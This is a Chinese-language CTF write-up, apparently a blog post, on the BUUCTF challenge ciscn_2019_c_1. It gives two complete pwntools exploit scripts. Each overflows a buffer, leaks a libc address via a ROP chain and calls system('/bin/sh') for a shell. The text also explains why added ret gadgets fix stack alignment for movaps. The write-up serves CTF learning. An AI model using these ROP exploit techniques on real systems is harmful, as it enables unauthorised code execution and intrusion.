下面是一位师傅的代码,文章跳转
from pwn import *
from LibcSearcher import *
context.log_level='debug'
r=process('./ciscn_2019_c_1')
elf = ELF('./ciscn_2019_c_1')
ret = 0x4006b9
pop_rdi_addr = 0x400c83
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_addr = elf.sym["main"]
r.sendlineafter(b"Input your choice!\n",b'1')
payload = b'\x00'+b'a'*0x57+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil(b"encrypted\n")
r.sendline(payload)
r.recvuntil(b"Ciphertext\n")
#
r.recvuntil(b"\n")
#
puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")
r.sendlineafter(b"Input your choice!\n",b'1')
payload1 = b'\x00'+b'a'*0x57+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)
r.recvuntil(b"encrypted\n")
r.sendline(payload1)
r.interactive()
关于为什么加上p64(ret),经过我调试发现是如下汇编代码出现问题。
=> 0x7ffff7a332f6 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
movqps指令,当源操作数或目标操作数是内存操作数时,操作数必须在 16 字节边界上对齐,否则会生成一般保护异常 (#GP),故p64(ret)是让rsp16字节对齐。
所以加上奇数个p64(ret)也可以,比如下面我加了三个p64(ret)。
from pwn import *
from LibcSearcher import *
context.log_level='debug'
# r = remote('node4.buuoj.cn',29156)
r=process('./ciscn_2019_c_1')
elf = ELF('./ciscn_2019_c_1')
ret = 0x4006b9
pop_rdi_addr = 0x400c83
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_addr = elf.sym["main"]
r.sendlineafter(b"Input your choice!\n",b'1')
payload = b'\x00'+b'a'*0x57+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil(b"encrypted\n")
r.sendline(payload)
r.recvuntil(b"Ciphertext\n")
#
r.recvuntil(b"\n")
#
puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")
r.sendlineafter(b"Input your choice!\n",b'1')
#
payload1 = b'\x00'+b'a'*0x57+p64(ret)+p64(ret)+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)
#
r.recvuntil(b"encrypted\n")
r.sendline(payload1)
r.interactive()
总结:system打不通且gdb调试时卡在了movaps处,尝试添加一个"ret"。
代码参考:
BUUCTF ciscn_2019_c_1_Loτυs的博客-CSDN博客
原理参考:
如有误解,请批评指正